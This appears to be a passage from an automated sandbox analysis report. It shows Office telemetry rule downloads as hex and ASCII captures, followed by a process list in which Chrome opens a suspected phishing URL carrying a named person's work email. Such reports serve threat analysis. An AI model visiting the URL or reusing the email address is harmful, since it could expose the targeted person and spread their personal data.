            Date: Thu, 21 Nov 2024 08:50:42 GMT
            Content-Type: text/xml
            Content-Length: 427
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
            ETag: "0x8DC582BB556A907"
            x-ms-request-id: 0adba8b5-901e-007b-7a05-3bac50000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085042Z-r1d97b99577l6wbzhC1TEB3fwn0000000a4000000000ev25
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:42 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


            Session IDSource IPSource PortDestination IPDestination Port
            67192.168.2.44982113.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:43 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:43 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:43 GMT
            Content-Type: text/xml
            Content-Length: 502
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
            ETag: "0x8DC582BB6A0D312"
            x-ms-request-id: 5c70d6ce-001e-00ad-368c-3a554b000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085043Z-178bfbc474bnwsh4hC1NYC2ubs00000001900000000089n8
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:43 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


            Session IDSource IPSource PortDestination IPDestination Port
            68192.168.2.44982213.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:43 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:43 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:43 GMT
            Content-Type: text/xml
            Content-Length: 407
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
            ETag: "0x8DC582B9D30478D"
            x-ms-request-id: 4ad18980-501e-008c-067e-3bcd39000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085043Z-1777c6cb7544n7p6hC1TEByvb40000000aw000000000gzu4
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:43 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


            Session IDSource IPSource PortDestination IPDestination Port
            69192.168.2.44982313.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:43 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:43 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:43 GMT
            Content-Type: text/xml
            Content-Length: 474
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
            ETag: "0x8DC582BB3F48DAE"
            x-ms-request-id: c9d02f83-e01e-0033-4d75-3b4695000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085043Z-1777c6cb754j47wfhC1TEB5wrw00000006ng00000000c4f4
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:43 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


            Session IDSource IPSource PortDestination IPDestination Port
            70192.168.2.44982413.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:43 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:44 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:43 GMT
            Content-Type: text/xml
            Content-Length: 408
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
            ETag: "0x8DC582BB9B6040B"
            x-ms-request-id: ecab23c4-c01e-00ad-2963-3ba2b9000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085043Z-178bfbc474b9fdhphC1NYCac0n0000000160000000005tx0
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:44 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


            Session IDSource IPSource PortDestination IPDestination Port
            71192.168.2.44982513.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:44 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net


            Click to jump to process

            Click to jump to process

            Click to jump to process

            Target ID:0
            Start time:03:49:14
            Start date:21/11/2024
            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
            Imagebase:0x7ff76e190000
            File size:3'242'272 bytes
            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:false

            Target ID:2
            Start time:03:49:20
            Start date:21/11/2024
            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2032,i,11957097260044928520,15021406713333812890,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Imagebase:0x7ff76e190000
            File size:3'242'272 bytes
            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:false

            Target ID:3
            Start time:03:49:23
            Start date:21/11/2024
            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com"
            Imagebase:0x7ff76e190000
            File size:3'242'272 bytes
            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            No disassembly